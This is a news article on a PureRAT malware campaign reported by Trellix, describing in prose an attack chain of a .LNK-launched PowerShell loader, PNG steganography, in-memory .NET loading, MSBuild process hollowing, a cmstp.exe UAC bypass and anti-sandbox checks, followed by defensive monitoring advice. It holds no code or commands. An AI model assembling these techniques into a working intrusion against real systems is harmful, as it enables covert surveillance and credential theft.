A sophisticated multi-stage cyberattack campaign delivering the PureRAT malware is leveraging advanced techniques such as PNG steganography and memory-only execution to evade detection and complicate forensic analysis. According to findings by Trellix, attackers are embedding malicious portable executable (PE) payloads inside seemingly harmless PNG images, allowing them to bypass traditional security defenses.

To begin with, the attack chain starts with a weaponized Windows shortcut (.LNK) file. Instead of launching a legitimate application, the file executes a hidden PowerShell command with a bypassed execution policy. As a result, it silently downloads an obfuscated VBScript file from a remote server and executes it using inherited user privileges.

Next, the VBScript loader introduces further layers of obfuscation and persistence. It copies itself to a public directory under a random name and uses Windows Management Instrumentation (WMI) to launch additional payloads in hidden windows. Moreover, it establishes persistence by creating a Task Scheduler job that runs every minute, ensuring continuous execution without user interaction.

The attack then escalates by delivering payloads through a fileless mechanism. Instead of dropping executable files to disk, the PowerShell loader retrieves PNG images that conceal base64-encoded malware. These images appear benign but contain hidden data between custom markers. The script extracts, decodes, and loads the malicious .NET assembly directly into memory using reflection. Consequently, all critical operations remain memory-resident, significantly reducing the chances of detection.

In addition, the campaign employs advanced evasion techniques. For instance, it uses process hollowing by injecting malicious code into a legitimate MSBuild process. This allows the malware to run under the guise of a trusted, signed binary while avoiding signature-based detection. Furthermore, the attackers implement a User Account Control (UAC) bypass using the cmstp.exe utility, enabling elevated execution without triggering standard security prompts.

To avoid analysis, the malware also performs anti-virtualization checks. It scans for indicators of sandbox environments, such as VMware artifacts or QEMU-related MAC addresses. If such conditions are detected, the malware halts execution, thereby evading security researchers and automated detection systems.

Once fully deployed, the final PureRAT payload operates as a modular post-exploitation framework. It begins by collecting detailed system information, including installed security tools, hardware identifiers, operating system details, and user privileges. Subsequently, attackers can deploy additional plugins to enable capabilities such as keylogging, remote desktop access, webcam and microphone surveillance, and credential theft.

Ultimately, this campaign demonstrates how threat actors are increasingly combining multiple stealth techniques to create highly evasive, fileless malware. By exploiting trusted Windows tools and disguising payloads within image files, they significantly raise the bar for detection.

To defend against such attacks, organizations should closely monitor suspicious PowerShell activity initiated by .LNK files, frequent creation of scheduled tasks, and unusual use of tools like cmstp.exe. Additionally, security teams should inspect network traffic for anomalies in image files and analyze memory-resident processes to detect hidden .NET assemblies.

As cyber threats continue to evolve, this campaign highlights the urgent need for advanced detection strategies that go beyond traditional file-based security measures.

Recommended Cyber Technology News:

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com